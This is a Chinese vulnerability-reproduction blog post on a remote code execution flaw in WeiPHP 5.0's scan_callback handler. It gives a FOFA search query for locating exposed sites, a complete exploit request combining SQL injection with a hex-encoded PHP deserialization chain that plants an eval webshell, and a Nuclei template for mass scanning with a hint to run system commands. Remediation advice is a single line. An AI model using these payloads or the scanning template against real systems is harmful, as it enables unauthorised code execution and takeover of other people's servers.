当前位置:   article > 正文

漏洞复现-weiphp5.0 scan_callback代码执行漏洞

漏洞复现-weiphp5.0 scan_callback代码执行漏洞

漏洞描述

weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。

影响版本

WeiPHP5.0

漏洞复现

FOFA:(body="content=\"WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")

 漏洞数据包

  1. POST /public/index.php/weixin/Notice/index?img=echo+md5(123);exit(); HTTP/1.1
  2. Host: 127.0.0.1
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
  4. Connection: close
  5. Content-Length: 1340
  6. Content-Type: application/x-www-form-urlencoded
  7. Accept-Encoding: gzip
  8. <xml>
  9. <product_id>aaaa</product_id>
  10. <appid>exp</appid>
  11. <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
  12. <mch_id>aaa</mch_id>
  13. <nonce_str>aaa</nonce_str>
  14. <openid>aaa</openid>
  15. </xml>

执行MD5加密值

使用MD5进行解密

批量检测

  1. id: weiphp-cms-scan_callback-rce
  2. info:
  3. name: weiphp-cms-scan_callback-rce
  4. author: unknow
  5. severity: critical
  6. description: weiphp5.0 scan_callback 存在代码执行漏洞。
  7. tags: weiphp,rce
  8. metadata:
  9. fofa-query: (body="content=\"WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")
  10. http:
  11. - raw:
  12. - |
  13. POST /public/index.php/weixin/Notice/index?img={{rce}}exit(); HTTP/1.1
  14. Host:
  15. Content-Type: application/x-www-form-urlencoded
  16. <xml>
  17. <product_id>aaaa</product_id>
  18. <appid>exp</appid>
  19. <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
  20. <mch_id>aaa</mch_id>
  21. <nonce_str>aaa</nonce_str>
  22. <openid>aaa</openid>
  23. </xml>
  24. payloads:
  25. rce:
  26. - "echo+md5(123);"
  27. matchers-condition: and
  28. matchers:
  29. - type: dsl
  30. dsl:
  31. - 'status_code_1==500 && contains(body_1, "202cb962ac59075b964b07152d234b70") && contains(header_1, "text/html")'
  32. #执行:echo+md5(123);system('whoami');

 修复建议

请关注官网更新 :https://www.weiphp.cn/

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/870924
推荐阅读
相关标签
  

闽ICP备14008679号